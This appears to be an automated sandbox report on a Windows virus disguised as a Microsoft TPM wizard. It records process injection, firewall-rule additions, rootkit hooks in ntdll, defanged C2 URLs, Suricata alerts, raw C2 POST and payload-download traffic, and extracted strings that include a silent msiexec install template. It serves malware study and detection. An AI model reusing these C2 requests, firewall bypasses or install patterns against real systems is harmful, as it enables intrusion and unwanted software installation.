MD5: 07f465a62b176b2c8399709ae964a0b6
SHA1: 88a1097b2a7507cb96fe4db5b52e6a9eb3257f36
SHA256: 12f0cd92b7a0c201647b4e2bfc38321d4f92fc15d07973353bc6aed345e4b1cd
SSDeep:
Size: 122368 bytes
File type: broken
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2005-04-28 14:35:22
Analyzed on: Windows7 SP1 32-bit

Summary:

Virus. A program that recursively replicates a possibly evolved copy of itself.

Payload

No specific payload has been found.

Process activity

The Virus creates the following process(es):

%original file name%.exe:1760
VRT26C2.tmp:1828
VRT28F.tmp:1856

The Virus injects its code into the following process(es):

INJ2AF6.tmp:3644
INJ6F2.tmp:2556
Explorer.EXE:2024

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process VRT26C2.tmp:1828 makes changes in the file system.
The Virus creates and/or writes to the following file(s):

C:\Windows\Temp\INJ2AF6.tmp (1 bytes)

The process VRT28F.tmp:1856 makes changes in the file system.
The Virus creates and/or writes to the following file(s):

C:\Windows\Temp\INJ6F2.tmp (919 bytes)

Registry activity

The process INJ2AF6.tmp:3644 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\INJ2AF6_RASAPI32]
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Virus deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:1760 makes changes in the system registry.
The Virus deletes the following value(s) in system registry:
The Virus disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"TpmInit"

The process VRT26C2.tmp:1828 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%WinDir%\temp]
"INJ2AF6.tmp" = "C:\Windows\TEMP\INJ2AF6.tmp:*:enabled:@shell32.dll,-1"

The process VRT28F.tmp:1856 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:
Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%WinDir%\temp]
"INJ6F2.tmp" = "C:\Windows\TEMP\INJ6F2.tmp:*:enabled:@shell32.dll,-1"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Virus installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile

Propagation

VersionInfo

Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.1.7600.16385
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: TpmInit.EXE
Internal Name: TpmInit.EXE
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
File Description: TPM Initialization Wizard
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://fun.losscook.bid/h_redir.php?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1070905474&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=240888132&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	54.230.187.104
hxxp://ec2-35-176-87-12.eu-west-2.compute.amazonaws.com/request/autok?user=youllupuki&ver=9&key=80784fb5bbf8032b8530b4c355ba180f	35.176.87.12
hxxp://ec2-35-176-87-12.eu-west-2.compute.amazonaws.com/request/conditions?user=youllupuki&ver=9&key=c3cec4a6f3958b958a6a270f8bbb7a49&token=c320afa79cbba676cc464a8b4ae82b70	35.176.87.12
hxxp://fun.losscook.bidhxxp://fun.losscook.bid/h_redir.php?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1070905474&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=240888132&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3	54.230.187.104
cf.ketor.ru
arnash.com
n2.rolmi.ru
uy.ziten.ru
towjeb.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Windows executable sent when remote host claims to send an image 2
ET POLICY Suspicious Windows Executable WriteProcessMemory
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN Backdoor User-Agent (InstallCapital)

Traffic

POST /request/autok?user=youllupuki&ver=9&key=80784fb5bbf8032b8530b4c355ba180f HTTP/1.1

Accept: */*

User-Agent: Christmas Mystery 5.5.4

Content-Type: application/x-www-form-urlencoded

Host: ec2-35-176-87-12.eu-west-2.compute.amazonaws.com

Content-Length: 0

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: text/plain; charset=utf-8

Content-Length: 152

Connection: keep-alive

Server: nginx

Date: Sat, 17 Jun 2017 00:19:15 GMT

X-Powered-By: PHP/5.6.30-1~dotdeb 7.1
7DVQskAg8OAyjlaxnqd 64pS  TVVZ96Z1oI8W4RCXcNYCGuqlqxYZ3oVaXH6BFzRqj9dH
JqlEHxhch/CFmqB5qfa4cORLJy4XeVMgLrIcRrkS877XeRnt08dU1vRP48cTwD9hTV54sO
6iZQ7LbjDA==....


POST /request/conditions?user=youllupuki&ver=9&key=c3cec4a6f3958b958a6a270f8bbb7a49&token=c320afa79cbba676cc464a8b4ae82b70 HTTP/1.1

Accept: */*

User-Agent: Christmas Mystery 5.5.4

Content-Type: application/x-www-form-urlencoded

Host: ec2-35-176-87-12.eu-west-2.compute.amazonaws.com

Content-Length: 1063

Cache-Control: no-cache

data=MrtGiEYg3vvPtldMSthNYMAZ6uSBUBJsE3ze+N2zUIsZTelrEC39W5jS5e4Qf+d6BudcE+j+6xd2zruUbefj15BgPtjtblGpN3jZfRSgfNz0t/Ni9G1UaylU4tCragScxMrTcwrm0oMk4QUoCCOIZvDDfq+9Rc0/9IJY3NXdKHC1w+ID78cjsCOozLUtgyJo63TNa+KzFtZm9xRj7Ff/xamKwLibIp2ttg4Y3Ou+yGxMnnLj+82rUd/vqQi2NrsdV3hI/nHk7c+VwuVGrJJu7QEboRR/aSIrI78nikGKSV1X0gkF1bZ995hG3dr535KUBz7+3nsctaweuEaSyCtP41j/4GluIX7RaDsXTujmboEV1w2ThM8b94e6joE+GpXHemWH5LYA78fUkphEBQQ5QU1z4Gnk3yciPG7r0SH3SMBDF8Rv2dL9qTLpJie47qtuxfedRCXlfpoOxcg4tmRDF8xWaj+SULMxjlkok6oMJD5WimHuhsif+biULlTmLXxr9YPX9Pa4E5MHW1k0GuwkgZSXk53bjF/GnHv1nzShBVm6xGS5Py/YUC8MSLpp0/LGq0FEkDdpTTtuw+N49Gbroca96FFSxZgx2U5XzoRBrPHyuYs6DXuwmw6LG2YAcuG6Sww4xmB5k4hlObW0jj12kmMeOIxgu/bzXg64Us2+vHz06ZFasEbANVKQYl36Wh1b2RL5rU5a3uPNbmUIgU08kGu/H02HUBnQCD4yMBQARpD4J3/TVo9PcxO6zKlK1DbcmLT7WKgxJYQ6CXmSXeiViRafbnp6nrBi+JNaT4efpTPqvP+F5FzsEQGhRsb/mWrUPVhIFMvmE8aaHv5xmUfM5ly6Y+BSu0dtcGOCCdqYn/3F18G9BR6HV7FujLNWehHVbrS9YNyLGjdXhYXgN+rHEQGhRsb/mWrUPVhIFMvmE8YQSg7GPX/sJYU9YrxsIbePalCUIlA2F+Ec1BgmC5ZoORdSVF8q9bcGzPm40nAnPIraKf3Rtbek5g==
HTTP/1.1 200 OK

Content-Type: text/plain; charset=utf-8

Content-Length: 440

Connection: keep-alive

Server: nginx

Date: Sat, 17 Jun 2017 00:19:15 GMT

X-Powered-By: PHP/5.6.30-1~dotdeb 7.1
nPaGjKrBVJvIl8ZNOJGFkBURRMNb1VxkJkpvd9UZBYHHFwVnSzb8SSyn6gwdyf49JHZVRH
sf1NKro6BmacBxsWjBb2bKEgJ3JZwswpSus50gCSL0E0YjRqqF6nCQB2odoMnkMh2nFWpX
m8fsTMOVVI3JHJbY7JNIdGzoiiloTJ/8xDJZpnU0UUJu8B4Wr6LQEN09HsY0PhOLDoZfHO
jaoSgceHEf7SksKWWRo6OPXmcV9qU/Q2OxZgEATJP2rOjKoeoky5tWqb92ui5c8SDRUv5o
X8fuPuvTLyYnBydTYzo3IgWz7UGg1emIX14VLXaoLH1qPdYiPzfYirBkw8K/GpqTL6WAfT
Nex5jNpMV1JLadO PmbNAHBqjyQfJd7ZEez5vGfy9kl92fCdnRHSDELfnutA9g6mB9OOsS
Yjg8D2BmxKGGmA47YQ==HTTP/1.1 200 OK..Content-Type: text/plain; charset
=utf-8..Content-Length: 440..Connection: keep-alive..Server: nginx..Da
te: Sat, 17 Jun 2017 00:19:15 GMT..X-Powered-By: PHP/5.6.30-1~dotdeb 7
.1..nPaGjKrBVJvIl8ZNOJGFkBURRMNb1VxkJkpvd9UZBYHHFwVnSzb8SSyn6gwdyf49JH
ZVRHsf1NKro6BmacBxsWjBb2bKEgJ3JZwswpSus50gCSL0E0YjRqqF6nCQB2odoMnkMh2n
FWpXm8fsTMOVVI3JHJbY7JNIdGzoiiloTJ/8xDJZpnU0UUJu8B4Wr6LQEN09HsY0PhOLDo
ZfHOjaoSgceHEf7SksKWWRo6OPXmcV9qU/Q2OxZgEATJP2rOjKoeoky5tWqb92ui5c8SDR
Uv5oX8fuPuvTLyYnBydTYzo3IgWz7UGg1emIX14VLXaoLH1qPdYiPzfYirBkw8K/GpqTL6
WAfTNex5jNpMV1JLadO PmbNAHBqjyQfJd7ZEez5vGfy9kl92fCdnRHSDELfnutA9g6mB9
OOsSYjg8D2BmxKGGmA47YQ==..

GET hXXp://fun.losscook.bid/h_redir.php?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1070905474&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=240888132&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1

Host: fun.losscook.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 0

Connection: close

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sat, 17 Jun 2017 00:18:28 GMT

X-Cache: Miss from cloudfront

Via: 1.1 00f70d80ca42cb07bb0c7279917c43a5.cloudfront.net (CloudFront)

X-Amz-Cf-Id: h6vfjfknNqQwti7ZSjYqoYSXh9bU3s42yS7AjsKmh9HwAg5Ju3DKAg==

.....)#~..n.`........&4.~.....K....(0.5......GpP....^.,...U.



q.vj...B..HOi.(#......!.|.....Z......4.i.`7L@........N.....8.-...U.w..
.k....2'\..fq..[..p.D...f-z.GQ.3i.......S..........pW......T.J.....~].
..lq6.k93..)..c].F...../.6I.Ip....oo.............Dq......j...g*.......
&.........x..*..0.........j.g....lO.I...7..&.$..<.y5..[..gz..f.ghs.
9|....C...C.Ne...l..R..*..ja..W0.*....x.mc......6....



Z..(%...Q.-



.a....4.@b....2t&..U$..A.z..*...Y.%s@.Y..y,fz.W...o.}d;....!..... '.}.
B.r..p^...d..R`x>...g...S....O}.:....T..1=.G.....9..$.z..a....4.@b.
...2t&..U$..A.z..*...Y.%s@.Y..y,fz.W...o.}d;....!..... '.}.B.r..p^...d
..R`x>...g...S....O}.:....T..1=.G.....9..$.z.

The Virus connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.gfids

@.tls

.rsrc

j.Yf;

_tcPVj@

.PjRW

Bv.SCv

inappropriate io control operation

not supported

operation canceled

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

address family not supported

broken pipe

function not supported

InitOnceExecuteOnce

operator

operator ""

?#%X.y

%S#[k

.text$di

.text$mn

.text$x

.text$yd

.idata$5

.CRT$XCA

.CRT$XCAA

.CRT$XCC

.CRT$XCL

.CRT$XCU

.CRT$XCZ

.CRT$XIA

.CRT$XIAA

.CRT$XIAC

.CRT$XIC

.CRT$XIZ

.CRT$XLA

.CRT$XLZ

.CRT$XPA

.CRT$XPX

.CRT$XPXA

.CRT$XPZ

.CRT$XTA

.CRT$XTZ

.rdata

.rdata$T

.rdata$r

.rdata$sxdata

.rdata$zzzdbg

.rtc$IAA

.rtc$IZZ

.rtc$TAA

.rtc$TZZ

.xdata$x

.idata$2

.idata$3

.idata$4

.idata$6

.data

.data$r

.gfids$x

.gfids$y

.tls$

.tls$ZZZ

.rsrc$01

.rsrc$02

KERNEL32.dll

SHELL32.dll

GetCPInfo

GetProcessHeap

.?AU_Crt_new_delete@std@@

.?AU?$parser_binder@U?$lexeme_directive@U?$plus@U?$action@U?$difference@U?$char_class@U?$char_code@Uchar_@tag@spirit@boost@@Uascii@char_encoding@34@@tag@spirit@boost@@@qi@spirit@boost@@U?$literal_char@Ustandard@char_encoding@spirit@boost@@$00$0A@@234@@qi@spirit@boost@@U?$actor@U?$basic_expr@Uplus_assign@tag@tagns_@proto@boost@@U?$list2@U?$actor@U?$attribute@$0A@@spirit@boost@@@phoenix@boost@@U?$actor@U?$argument@$0A@@spirit@boost@@@23@@argsns_@45@$01@exprns_@proto@boost@@@phoenix@4@@qi@spirit@boost@@@qi@spirit@boost@@@qi@spirit@boost@@U?$bool_@$0A@@mpl@4@@detail@qi@spirit@boost@@

.?AU?$parser_binder@U?$sequence@U?$cons@U?$literal_char@Ustandard@char_encoding@spirit@boost@@$00$0A@@qi@spirit@boost@@U?$cons@U?$not_predicate@U?$literal_char@Ustandard@char_encoding@spirit@boost@@$00$0A@@qi@spirit@boost@@@qi@spirit@boost@@U?$cons@U?$lexeme_directive@U?$plus@U?$action@U?$difference@U?$char_class@U?$char_code@Uchar_@tag@spirit@boost@@Uascii@char_encoding@34@@tag@spirit@boost@@@qi@spirit@boost@@U?$literal_char@Ustandard@char_encoding@spirit@boost@@$00$0A@@234@@qi@spirit@boost@@U?$actor@U?$basic_expr@Uplus_assign@tag@tagns_@proto@boost@@U?$list2@U?$actor@U?$attribute@$0A@@spirit@boost@@@phoenix@boost@@U?$actor@U?$argument@$0A@@spirit@boost@@@23@@argsns_@45@$01@exprns_@proto@boost@@@phoenix@4@@qi@spirit@boost@@@qi@spirit@boost@@@qi@spirit@boost@@U?$cons@U?$literal_char@Ustandard@char_encoding@spirit@boost@@$00$0A@@qi@spirit@boost@@Unil_@fusion@4@@fusion@4@@fusion@4@@fusion@4@@fusion@boost@@@qi@spirit@boost@@U?$bool_@$0A@@mpl@4@@detail@qi@spirit@boost@@

C:\Windows\TEMP\INJ6F2.tmp

:::#111./// ---

333333331

@.reloc

D$8j.Xf

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

GetProcessWindowStation

openUrl

appCmd

appImageUrl

appSetupUrl

appTYUrl

HTTP/1.1

GET hXXp://

POST hXXp://

hXXps://

hXXp://

Fx

id[]=%d

application/x-www-form-urlencoded

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

IE.HTTP

FirefoxURL

Firefox

ChromeHTML

Chrome

HTTP\shell\open\command

RegOpenKeyTransactedW

CreateDialogIndirectParamW

USER32.dll

CryptImportKey

CryptSetKeyParam

CryptDestroyKey

RegOpenKeyExW

RegCloseKey

RegEnumKeyW

RegOpenKeyExA

GetWindowsAccountDomainSid

ADVAPI32.dll

COMCTL32.dll

ole32.dll

WS2_32.dll

SHFileOperationW

ShellExecuteW

ShellExecuteExW

SHLWAPI.dll

OLEAUT32.dll

GDI32.dll

WinHttpOpen

WinHttpConnect

WinHttpOpenRequest

WinHttpSetTimeouts

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpWriteData

WinHttpReceiveResponse

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpCloseHandle

WINHTTP.dll

VERSION.dll

zcÁ

.?AVHttpRequestContent@@

:::#222.111 )))

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>

: :$:(:,:0:4:

6(606\6`6

7333331

33333333

3333331

7331331

3333333

1333331

37333333331

3337333333333333

33333331

1333333

33373131

3333731

33331333731

3313331

333133333

33337333

33333313733

33333333331

337333333

3733313

333333313333

3333333333731

33333331333331

31333333

3733330

3331133

2 #332""

3133331

3333333330

"""#33"#3330#33

"""#2#30

3333333333

333333333031

3333333333333333330

333333333333331

333333333

333333333233333

3333333332

3333333333331

3333313333333

333333333333

333333330

#3333230

33333332

3333333331

33333330

333333332

33333333333331

333333313333333

#3233332

3333333333333333331

333333333333333

3333333333333331

3333332

33333333333333331

33333333333333333

3333333133333

#3233330

3333332330

33333333333333

3333330333

33333333313331

3333333333333330

"""#33330

33333332

3333333333333333333

33333333333333333331

3333333333333

3333333333333333332

33333333333333333333

3333323

3333333333333

333333333333333332

3333333333333333333

3333333313331

3373330

333313333333333331

3333333313333

333333333

333333333333333331

333333333333333333

33333333333333

33333333333

333133333331

333333333331

33333333333332

33333333333330

3330#3333

33333333333333333330

3333333333330

3333333330330

3333331333

33333331330

33337333333332

3333330

3331333

3333333333333333

33333333333

33333331333333333330

3333333133333333333

3333333333333333133

333333313333333332

33333331333333332

3333333333332

333333331333333332

333333333330

3333333331330

3333131

3333333133333333331

313333331

333333233333333

13333331

33333333330

33333333333333330

3332333333333

3333333133333333

2#3"# #0

3332333333

333333333333333330

"330""32

333333233333333330

33333333333333333

3133333333

33333333333333332

3313333333333333331

333333373

33303330

33323333

13333333

330#3333

33332333330

333333372

333333333130

33333333233333

33233333330

1333333333330

3323333333333330

33333373

3333333333333373

3333333333

#2#"""#""3332""33

33333333332

3333333070

33333373333

333333070

3#3333070

3333333333333332

33333333030

333331331

3333333

323332 "

3330330

333313331

333333333333332

333333333333330

2333333333333332

3333730

"""#3331

23333333333333330

3030373330

"""#333!

333333333333233

33333333333333330333

333333333333

33333333

33331330

3333333331333

33 #2330

3333232

33 #3330

333333332

03333332

333333333332

3330333333330

33323330

333"#330

323333333333323330

3333333333333373333

333#3331

333333373333333333

33333333332

#33330#3

7333333130

3033333

30333330

3""33332

#33331333

332"#""3333

3323330

3323233333333333331

333"#2#3333

#3333#33

3333033373

"32#3333

#32#3332

""""332#333"

3333233333330

33333337330

3333233333332

33332333333332

333333337330

333333337331

23333332

3033333

2333333

33332#2"

333323333333330

3333130

3333333333331331

333333333333333

33#332#330

"3333""0

#3333""0

333"#3332

33""#3332

33373333333333

3333333337

3133333

""32""30

333333133

3333333733333333333

3332"""#

3733333333

31333333331

3333333331331

07333333330

333'3330330

3333313

3313333331

32""#3330#32

73333333333333333

33133333331

3 "#3330

333333373333333332

332 #330

333333333333333332

3337330

2#3"#3""

3233333331

333373330

332#333"

#33323332"

33#33332"

32#3333"

33333373331

""#233331

""#32""32

"#3332#1

233332"32

2#332""32

0"#33332

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

name='Microsoft.Windows.Common-Controls' version='6.0.0.0'

processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />

0050<0`0

=!=&=>=_=

4 5P5D5O5f5

9 :$:(:,:

kernel32.dll

mscoree.dll

ext-ms-win-ntuser-windowstation-l1-1-0

portuguese-brazilian

1.0.0.1

combase.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

USER32.DLL

%systemroot%\system32\msiexec.exe

"%s" /i "%s" /quiet %s

"%s" ,%s %s

B%s\%s

/Cookie: %s

.runas

%d.%d.%d.%d

diexplore.exe

firefox.exe

chrome.exe

Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

@Advapi32.dll

{8856F961-340A-11D0-A96B-00C04FD705A2}

INJ6F2.tmp_2556_rwx_002C0000_0005F000:

.text

`.rdata

@.data

.rsrc

@.reloc

D$8j.Xf

j.Yf;

_tcPVj@

.PjRW

Dw.AEw

}Bv.SCv%

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

operator

GetProcessWindowStation

openUrl

appCmd

appImageUrl

appSetupUrl

appTYUrl

HTTP/1.1

GET hXXp://

POST hXXp://

hXXps://

hXXp://

Fx

id[]=%d

application/x-www-form-urlencoded

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

IE.HTTP

FirefoxURL

Firefox

ChromeHTML

Chrome

HTTP\shell\open\command

RegOpenKeyTransactedW

GetProcessHeap

KERNEL32.dll

CreateDialogIndirectParamW

USER32.dll

CryptImportKey

CryptSetKeyParam

CryptDestroyKey

RegOpenKeyExW

RegCloseKey

RegEnumKeyW

RegOpenKeyExA

GetWindowsAccountDomainSid

ADVAPI32.dll

COMCTL32.dll

ole32.dll

WS2_32.dll

SHFileOperationW

ShellExecuteW

ShellExecuteExW

SHELL32.dll

SHLWAPI.dll

OLEAUT32.dll

GDI32.dll

WinHttpOpen

WinHttpConnect

WinHttpOpenRequest

WinHttpSetTimeouts

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpWriteData

WinHttpReceiveResponse

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpCloseHandle

WINHTTP.dll

VERSION.dll

GetCPInfo

zcÁ

.?AVHttpRequestContent@@

C:\Windows\TEMP\INJ6F2.tmp

:::#222.111 )))

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>

: :$:(:,:0:4:

6(606\6`6

combase.dll

kernel32.dll

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

%systemroot%\system32\msiexec.exe

"%s" /i "%s" /quiet %s

"%s" ,%s %s

.%s\%s

/Cookie: %s

.runas

%d.%d.%d.%d

diexplore.exe

firefox.exe

chrome.exe

Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

,Advapi32.dll

{8856F961-340A-11D0-A96B-00C04FD705A2}

INJ6F2.tmp_2556_rwx_00CC1000_0005C000:

333333331

.text

`.rdata

@.data

.rsrc

@.reloc

D$8j.Xf

j.Yf;

_tcPVj@

.PjRW

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

operator

GetProcessWindowStation

openUrl

appCmd

appImageUrl

appSetupUrl

appTYUrl

HTTP/1.1

GET hXXp://

POST hXXp://

hXXps://

hXXp://

Fx

id[]=%d

application/x-www-form-urlencoded

Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

IE.HTTP

FirefoxURL

Firefox

ChromeHTML

Chrome

HTTP\shell\open\command

RegOpenKeyTransactedW

GetProcessHeap

KERNEL32.dll

CreateDialogIndirectParamW

USER32.dll

CryptImportKey

CryptSetKeyParam

CryptDestroyKey

RegOpenKeyExW

RegCloseKey

RegEnumKeyW

RegOpenKeyExA

GetWindowsAccountDomainSid

ADVAPI32.dll

COMCTL32.dll

ole32.dll

WS2_32.dll

SHFileOperationW

ShellExecuteW

ShellExecuteExW

SHELL32.dll

SHLWAPI.dll

OLEAUT32.dll

GDI32.dll

WinHttpOpen

WinHttpConnect

WinHttpOpenRequest

WinHttpSetTimeouts

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpWriteData

WinHttpReceiveResponse

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpCloseHandle

WINHTTP.dll

VERSION.dll

GetCPInfo

zcÁ

.?AVHttpRequestContent@@

:::#222.111 )))

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>

: :$:(:,:0:4:

